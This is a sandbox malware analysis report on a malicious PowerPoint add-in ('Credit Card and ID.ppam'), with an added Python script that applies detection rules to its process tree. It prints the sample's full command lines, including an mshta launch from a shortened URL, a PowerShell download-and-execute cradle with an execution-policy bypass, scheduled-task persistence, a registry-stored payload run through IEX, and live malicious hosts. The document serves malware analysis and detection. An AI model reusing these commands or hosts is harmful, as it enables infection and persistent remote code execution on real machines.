Windows Analysis Report: Credit Card and ID.ppam

Overview

General Information

Sample Name: Credit Card and ID.ppam
Analysis ID: 528749
MD5: 6af8522af160215e3c0f8883588e20d0
SHA1: f7cde5b67c5aa15f8d4366337792e468257b3fda
SHA256: 1ca83ab27034a36bd899d91ed335e692afa949a4f1a1b30887e3f7d8651b63d1
Tags: ppam

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Sigma detected: Suspicious MSHTA Process Patterns
Writes or reads registry keys via WMI
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Sigma detected: MSHTA Spawning Windows Shell
Creates autostart registry keys with suspicious values (likely registry only malware)
Sigma detected: Mshta Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Connects to a URL shortener service
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • POWERPNT.EXE (PID: 2596 cmdline: "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cmd.exe (PID: 1212 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\Credit Card and ID.ppam" MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 2796 cmdline: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
      • mshta.exe (PID: 1292 cmdline: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB); MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • schtasks.exe (PID: 2044 cmdline: C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\" MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)
  • WmiPrvSE.exe (PID: 200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 619A67C9F617B7E69315BB28ECD5E1DF)
  • taskeng.exe (PID: 2408 cmdline: taskeng.exe {99CBF033-5891-4579-A9C8-09ABEC64739D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • mshta.exe (PID: 2612 cmdline: C:\Windows\system32\MsHtA.EXE "https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html" MD5: 95828D670CFD3B16EE188168E083C3C5)
  • powershell.exe (PID: 2104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • powershell.exe (PID: 1916 cmdline: powershell.exe ((gp HKCU:\Software).cookerr)|IEX MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • mshta.exe (PID: 2732 cmdline: C:\Windows\system32\MsHTa.exe" "http://www.starinxxxgkular.duckdns.org/s1/30.txt MD5: 95828D670CFD3B16EE188168E083C3C5)
  • powershell.exe (PID: 2808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • mshta.exe (PID: 1608 cmdline: C:\Windows\system32\MsHTa.exe" "http://www.starinxxxgkular.duckdns.org/s1/30.txt MD5: 95828D670CFD3B16EE188168E083C3C5)
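The process tree above is the whole infection chain in one place: PowerPoint, opened on the .ppam add-in, runs mshta.exe on a shortened URL (through a `calc\..\mshta` path so the image path does not read "mshta"), mshta spawns PowerShell with `-ExecutionPolicy Bypass` and a quote-spliced `i'E'x(iwr(...))` download cradle, a scheduled task re-runs mshta against a blogspot page every 63 minutes, and a later stage is executed straight out of a registry value (`(gp HKCU:\Software).cookerr | IEX`). The Python script below is an added example, not part of the Joe Sandbox report: it encodes those Sigma-style checks over the tree and pulls the real hosts out of the `user@host` URLs the sample uses. The process list is constructed from the report (parent links from the indentation, quoting of the schtasks entry normalized), and the rule names are this example's own.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the process tree from this report, reduced to
# (pid, parent_pid, image, command line). Parent links follow the tree
# indentation; PIDs and command lines are the report's, with the quoting
# of the schtasks entry normalized (the report shows it with doubled quotes).
PROCESSES = [
    (2596, None, "POWERPNT.EXE",
     '"C:\\Program Files\\Microsoft Office\\Office14\\POWERPNT.EXE" /AUTOMATION -Embedding'),
    (1212, None, "cmd.exe",
     'C:\\Windows\\system32\\cmd.exe /c "C:\\Users\\user\\Desktop\\Credit Card and ID.ppam"'),
    (2796, 1212, "POWERPNT.EXE",
     '"C:\\Program Files\\Microsoft Office\\Office14\\POWERPNT.EXE" "C:\\Users\\user\\Desktop\\Credit Card and ID.ppam"'),
    (1292, 2796, "mshta.exe",
     "c:\\windows\\system32\\calc\\..\\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse"),
    (2944, 1292, "powershell.exe",
     '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoProfile -ExecutionPolicy Bypass '
     "-Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/"
     "8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);"),
    (2044, 1292, "schtasks.exe",
     '"C:\\Windows\\System32\\schtasks.exe" /create /sc MINUTE /mo 63 /tn "kqopaueyu" /F '
     '/tr "\\"MsHtA\\"\\"https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\\""'),
    (1916, None, "powershell.exe",
     "powershell.exe ((gp HKCU:\\Software).cookerr)|IEX"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
          "rundll32.exe", "regsvr32.exe"}
URL_RE = re.compile(r"""https?://[^\s"'\\)]+""", re.I)


def normalize_ps(cmd):
    """Undo the two cheap obfuscations in the sample: quotes spliced into a
    token (i'E'x -> iex) and random casing (pOwersHelL). Quotes that delimit
    real string arguments ('https://...') are left alone."""
    return re.sub(r"""(?<=\w)['"](?=\w)""", "", cmd).lower()


def extract_urls(cmd):
    """Return (url, real_host, userinfo) for each URL in a command line.
    The sample writes https://hahahahh@j.mp/...: a fake user name before
    the '@' so a naive host parse stops at the wrong place. urlsplit keeps
    the two apart."""
    out = []
    for m in URL_RE.finditer(cmd):
        u = urlsplit(m.group(0))
        out.append((m.group(0), u.hostname, u.username))
    return out


def analyze(procs):
    """Apply Sigma-style rules to a list of (pid, ppid, image, cmdline).
    Returns (pid, rule, detail) triples; rule names are this example's own."""
    by_pid = {p[0]: p for p in procs}
    findings = []
    for pid, ppid, image, cmd in procs:
        img = image.lower()
        parent = by_pid.get(ppid)
        pimg = parent[2].lower() if parent else ""
        norm = normalize_ps(cmd)
        first_token = cmd.split(" ", 1)[0]
        if pimg in OFFICE_APPS and img in SHELLS:
            findings.append((pid, "office_spawns_shell", f"{parent[2]} -> {image}"))
        if pimg == "mshta.exe" and img in SHELLS:
            findings.append((pid, "mshta_spawns_shell", f"{parent[2]} -> {image}"))
        if img == "mshta.exe" and URL_RE.search(cmd):
            findings.append((pid, "mshta_remote_hta", cmd))
        # calc\..\mshta: a traversal segment in the image path is never typed
        # by hand; it is there to defeat rules that key on the literal path.
        if re.search(r"\\\.\.\\", first_token):
            findings.append((pid, "path_traversal_in_image", first_token))
        if img == "powershell.exe":
            if re.search(r"-e[a-z]*\s+bypass", norm):
                findings.append((pid, "execpolicy_bypass", ""))
            if re.search(r"\biex\b|invoke-expression", norm) and re.search(
                    r"\biwr\b|invoke-webrequest|downloadstring|net\.webclient", norm):
                findings.append((pid, "download_cradle", ""))
            # (gp HKCU:\Software).cookerr | IEX: the stage lives in a registry
            # value and never touches disk as a script file.
            if re.search(r"\b(gp|get-itemproperty)\s+hk(cu|lm)", norm) and re.search(
                    r"\biex\b|invoke-expression", norm):
                findings.append((pid, "registry_stored_payload", ""))
        if img == "schtasks.exe" and "/create" in norm:
            m = re.search(r"/tr\s+(.*)", cmd, re.I)
            action = m.group(1) if m else ""
            if re.search(r"mshta|powershell|https?://", action, re.I):
                findings.append((pid, "scheduled_task_lolbin", action))
    return findings


def hosts(procs):
    """Sorted, de-duplicated real host names from every command line."""
    return sorted({h for _, _, _, cmd in procs for _, h, _ in extract_urls(cmd)})


if __name__ == "__main__":
    for pid, rule, detail in analyze(PROCESSES):
        print(f"{pid:>5}  {rule:<26} {detail[:70]}")
    print("hosts:", ", ".join(hosts(PROCESSES)))
```

Two design points carry over to real telemetry: match on the parent/child image pair rather than on the command line alone (the `calc\..\mshta` entry shows why a path-string rule is brittle), and normalize PowerShell before matching, because `i'E'x` and `pOwersHelL` are exactly the splices the Yara rule `PowerShell_Case_Anomaly` below is written to catch.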

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000005.00000003.440508255.00000000002D7000.00000004.00000001.sdmp | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
  • 0x63b8:$s1: pOwersHelL
  • 0x6f3a:$s1: pOwersHelL
  • 0x63d6:$k1: -NoProfile
  • 0x6f58:$k1: -NoProfile
  • 0x63d6:$kn2: -NoProfile
  • 0x6f58:$kn2: -NoProfile
Source: 00000005.00000003.439129933.0000000003A3E000.00000004.00000001.sdmp | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
  • 0x2e4:$s1: pOwersHelL
  • 0x11c4:$s1: pOwersHelL
  • 0x20a4:$s1: pOwersHelL
  • 0x2f84:$s1: pOwersHelL
  • 0x3d76:$s1: pOwersHelL
  • 0x4b08:$s1: pOwersHelL
  • 0x302:$k1: -NoProfile
  • 0x11e2:$k1: -NoProfile
  • 0x20c2:$k1: -NoProfile
  • 0x2fa2:$k1: -NoProfile
  • 0x3d94:$k1: -NoProfile
  • 0x4b26:$k1: -NoProfile
  • 0x302:$kn2: -NoProfile
  • 0x11e2:$kn2: -NoProfile
  • 0x20c2:$kn2: -NoProfile
  • 0x2fa2:$kn2: -NoProfile
  • 0x3d94:$kn2: -NoProfile
  • 0x4b26:$kn2: -NoProfile
Source: 00000005.00000003.439823527.0000000003A41000.00000004.00000001.sdmp | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
  • 0xd76:$s1: pOwersHelL
  • 0x1b08:$s1: pOwersHelL
  • 0xd94:$k1: -NoProfile
  • 0x1b26:$k1: -NoProfile
  • 0xd94:$kn2: -NoProfile
  • 0x1b26:$kn2: -NoProfile
Source: 00000005.00000002.441615888.0000000003A42000.00000004.00000001.sdmp | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
  • 0xb08:$s1: pOwersHelL
  • 0xb26:$k1: -NoProfile
  • 0xb26:$kn2: -NoProfile
Source: 00000005.00000003.430608858.00000000002D2000.00000004.00000001.sdmp | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
  • 0x87c:$s1: pOwersHelL
  • 0x89a:$k1: -NoProfile
  • 0x89a:$kn2: -NoProfile

Sigma Overview

System Summary:

Sigma detected: Suspicious MSHTA Process Patterns
Source: Process started | Author: Florian Roth | Data: Command: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, CommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam, ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 2796, ProcessCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ProcessId: 1292
Sigma detected: Change PowerShell Policies to a Unsecure Level
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1292, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, ProcessId: 2944
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, CommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam, ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 2796, ProcessCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ProcessId: 1292
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1292, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, ProcessId: 2944
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1292, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, ProcessId: 2944
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1292, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, ProcessId: 2944

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Credit Card and ID.ppam | Virustotal: Detection: 23%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\30[1].htm | Avira: detection malicious, Label: JS/Dropper.G4
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 67.199.248.16:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 205.196.123.58:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.168.45:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbrogr source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbiles source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbLE=C source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\mshta.exe
Source: global traffic | DNS query: name: j.mp
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:443
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:443

Networking:

Uses dynamic DNS services
Source: unknown | DNS query: name: www.starinxxxgkular.duckdns.org
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View | JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: Joe Sandbox View | IP Address: 104.16.203.237
Source: Joe Sandbox View | IP Address: 104.16.203.237
Source: global traffic | HTTP traffic detected: GET /ODOASODOccomplermxjdajse HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: j.mp | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /file/o7mbmqzedgahqhw/30.doc/file HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive | Host: www.mediafire.com
Source: global traffic | HTTP traffic detected: GET /k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Cookie: ukey=6xpb2tazciakllrv4ebq5j0751h13hdf | Connection: Keep-Alive | Host: download1370.mediafire.com
